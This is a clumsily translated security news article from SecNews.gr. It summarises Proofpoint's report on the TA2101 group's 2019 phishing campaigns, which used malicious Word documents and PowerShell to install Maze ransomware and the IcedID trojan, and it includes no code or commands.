Home / security / Hackers infect systems using Metasploit and malicious Word documents

Hackers infect systems using Metasploit and malicious Word documents

by Absent Mia Leave a Comment

hackers

Some researchers have recently discovered one new hacking club, whose name is TA2101 and it does attacks into a German and Italian Companies For the purpose of install malware backdoor on network their. TA2101 hackers use legal penetration testing tools and backdoor framework, such as Cobalt Strike and Metasploit to exploit victims' systems.

Usually, these tools are used by companies to identify vulnerabilities and protect their systems. However, we have seen other hacking teams as well Cobalt Group, APT32 and APT19 use them to develop malware.

Attackers usually begin their attacks with Phishing techniques and social engineering and continue with banking Trojans and ransomware.

The researchers also discovered that the new hacking team TA2101 used the ransomware Maze to attack an Italian company, as well as his social engineering technique.

Exploit Windows via malicious Word documents

The attacks by the TA2101 team were discovered by its researchers Proofpoint. The malicious campaign took place between 16 October and 12 November 2019. The hackers were sending maliciously emails to companies in Germany, Italy and the United States. Their main goals were IT services, construction companies and healthcare organizations.

According to researchers, most emails contained malicious Word documents.

The message urged victims to open the malicious attachment. If users clicked on the document, they would be enabled running the PowerShell script.

The Powershell script, in turn, downloaded and installed it Maze of ransomware to the victim's device.

The hackers were sending different emails to the victims. In some of them, he seemed like the sender of it German Federal Ministry of Finance. The victims they should open the malicious document to find information on how to avoid further taxation and penalties.

Recently, Proofpoint researchers found another email campaign containing maliciously Word documents that infected victims' systems with IcedID banking Trojan.

And in that campaign, the malicious document led to the installation of malware, payload IcedID, into the corporate systems. The main objective of the campaign was health care organizations. The system contamination process was the same as the recent TA2101 campaign.

The techniques used by this hacking team are very sophisticated and show that hackers are very experienced and ready for many more attacks.

How useful was this post?

Average rating / 5. Vote count:

No votes so far! Be the first to rate this post.

Share
Do you have an opinion? Leave your comment.

The author allows you to copy his / her text only if you report the source (SecNews.gr), as an e-mail address (Live URL) of the article.
Updated on by Absent Mia
Absent Mia

About Absent Mia

Being your self, in a world that constantly tries to change you, is your greatest achievement

Reader Interactions

Comment Policy:

SecNews.gr does not immediately post comments. Malicious comments, comments that include ads, or comments with insults are deleted without any warning. We do not endorse the views expressed by our readers.

Leave a reply

Your email address is not published. Τα υποχρεωτικά πεδία σημειώνονται με *

el Greek
ar Arabiczh-CN Chinese (Simplified)en Englishfr Frenchde Germanel Greekit Italianru Russian